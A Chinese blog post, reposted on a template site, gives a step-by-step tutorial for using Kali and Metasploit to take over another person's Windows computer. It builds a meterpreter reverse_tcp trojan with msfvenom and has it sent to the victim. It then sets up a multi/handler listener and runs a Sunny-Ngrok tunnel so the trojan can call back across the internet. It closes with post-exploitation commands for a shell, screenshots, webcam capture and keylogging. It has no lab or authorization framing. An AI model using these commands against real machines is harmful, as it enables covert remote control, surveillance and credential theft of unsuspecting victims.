kali渗透内网和外网

这篇具有很好参考价值的文章主要介绍了kali渗透内网和外网。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)

第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:

-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”

lhost:设置kali的IP

lport:设置端口(要与下面的setlport保持一致)

-f:文件的类型为exe类型

-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe

第二步:将生成的木马文件发送到对方电脑

我们启动kali

msfconsole 进入msfconsole

use exploit/multi/handler 使用这个漏洞辅助

kali渗透内网和外网

设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

kali渗透内网和外网

exploit 或 run

kali渗透内网和外网

接下来我们只要等对方电脑运行刚刚那个木马

生成木马文件,从而控制对方电脑(内网可以入侵外网)

在开始生成木马之前,我们要先做好准备工作

在kali里面要下载Sunny-Ngrok的Linux64版本,下载好后解压

接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用

kali渗透内网和外网

这里将下载好的linux64压缩包进行解压

命令解压缩:unzip linux_amd64(压缩包名)

kali渗透内网和外网

进入解压好的目录

cd linux_amd64

启动隧道映射TCP服务

./sunny clientid (隧道id) 这里的隧道id看下图

kali渗透内网和外网

启动后是这样的

kali渗透内网和外网

接下来就是生成外网的木马程序了

注意:这里lhost和lport分别为赠送的域名和端口

msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

kali渗透内网和外网

接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了

msfconsole 打开msf

use exploit/multi/handler 使用这个漏洞辅助

set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set LHOST 192.168.245.140 这里设置成kali的IP

set LPORT 4444 这里是你要侦听的端口

这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网

show options 查看IP端口设置情况

exploit 或 run 开启侦听

接下来我们只要等对方电脑运行刚刚那个木马

成功后时以下这图

kali渗透内网和外网

入侵成功后所能做的(这只是可以做的一部分)

getuid 获取靶机uidmeterpreter

shell 进入靶机shellmeterpreter

screenshot 靶机截屏meterpreter

webcam_snap 用靶机摄像头拍照meterpreter

webcam_stream 用靶机摄像头录像meterpreter

keyscan_start 开启键盘记录meterpreter

keyscan_dump 捕获键盘记录

keyscan_stop 停止键盘记录文章来源地址https://www.toymoban.com/news/detail-475800.html

到了这里,关于kali渗透内网和外网的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 路由表配置过程及多网卡同时使用内网和外网全程图解

    CMD命令:route 子命令1:route print 查看路由表 子命令2:route add 添加静态路由 子命令3:route delete 删除静态路由 查看 使用子命令1结果如下图 (注:红框为动态路由[由系统管理,无需要人工管理],绿框为静态路由[可由人工自由增删]) 可以看出路由表由以下几部分组成:网络

    2024年02月06日
    浏览(26)
  • 笔记本电脑同时访问wifi和有线网络、内网和外网配置教程

    1.一台电脑同时访问内网和外网(两个网段);2.一台电脑同时插着网线和wifi能够同时使用。 1.win+R启动cmd运行,在其中输入“gpedit.msc”,进入本地策略编辑器,在“计算机配置-管理模板-网络-Windows连接管理器”中,点击“设置-最小化到Internet或Windows域的同时连接数-编辑策

    2024年02月13日
    浏览(41)
  • Mac下双网关设置(Wi-Fi 和网线同时访问内网和外网)

    公司为了安全,需要在内网环境下使用云桌面进行开发,但是连接网线后 WiFi 就失效,所以需要配置双网关。 目的:通过无线访问外网,有线访问ip地址以50开头的内网,且无线的优先级高。 1.1:首先连接网线查看配置 记下ip 地址,子网掩码和路由器。后面配置使用。 1.2:

    2024年02月08日
    浏览(30)
  • 关于win10、win11电脑同时使用有线、无线访问内网和外网的配置方法

    PS:首先需要接通内网网线,并连接外网wifi。(台式电脑可以通过外置无线网卡实现连接外网wifi)     同时按下“win”+“R”键,输入“cmd”并点击“Enter”键或者“确定”按钮;     输入“route delete 0.0.0.0”并点击“Enter”键;     输入“route add 0.0.0.0 mask 0.0.0.0 192.168.0.1

    2024年02月09日
    浏览(37)
  • Kali linux windows木马(外网) 保姆级教学

    前言 实现外网控制需要一个外网的IP负责监听,本次使用的是https://www.fgnwct.com(飞鸽内网穿透)有免费的隧道 kali.org(kali官网) 详细教程查询官网。 此系列仅用于工作和学习,禁止用于非法攻击。一切遵守《网络安全法》 环境 windows7 kali linux 2021 下载客户端,解压出文件 \\\'\\\'

    2023年04月26日
    浏览(29)
  • windows 11同时保持有线内网和无线外网连接设置

    进入组策略编辑器(仅专业版系统支持) 更改组策略-计算机配置-管理模板-网络-Windows连接管理器-最小化到 Internet 或 Windows 域的同时连接数:更改状态为已启用,值为0-允许同时连接。 更改有线网络适配器跃点数 更改无线网络适配器跃点数

    2024年02月11日
    浏览(33)
  • KaLi做木马渗透实战案例

    此文章可能会包含敏感以及危险的命令❗❗❗命令有风险,回车需谨慎。 此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!! ┌──( root💀KaLi-Erhe )-[ ~ ] └─# cat 重要的事情说三遍 ❗❗❗ ⭕命令有风险,回车

    2024年02月11日
    浏览(25)
  • Kali Linux渗透测试小实践——Metasploit与后门木马

    目录 一、环境和工具准备 1.Metasploit 2.Kali Linux与靶机 二、实践过程 1.打开Kali Linux,进入终端 2.输入生成木马的命令,并配置相关参数 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评

    2024年02月13日
    浏览(31)
  • 只有1个公网IP地址---设置内网服务器 +++ 华为路由器:外网可以访问内网服务区---内网服务区访问不了外网---内网办公区可以访问外网和内网服务区(只有1个公网IP地址)

    1.公司只有一个公网IP地址66.66.66.66/24 同时满足以下3点:  1.外网可以访问内网服务区(DMZ); 2.内网服务区(DMZ)无法访问外网; 3.内网办公区可以访问外网和内网服务区(DMZ)。 注释:R:公司路由、ISP:电信路由、R3外网路由 1.配置PC、路由器接口IP地址; 具体配置见代码

    2024年02月13日
    浏览(31)
  • 利用msf进行内网的木马渗透详细教程

    本文仅限学术交流,请勿用他人实践 本文通过kali系统进行内网渗透。主机 ip:172.20.10.14 靶机ip:172.20.10.3(win10)  文章目录 前言 一 准备工作 二 进行渗透 1.开启服务:需要开启apache和postgresql服务 2.制作木马文件,利用msf进行渗透 总结  提示:以下是本篇文章正文内容,下

    2023年04月08日
    浏览(34)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包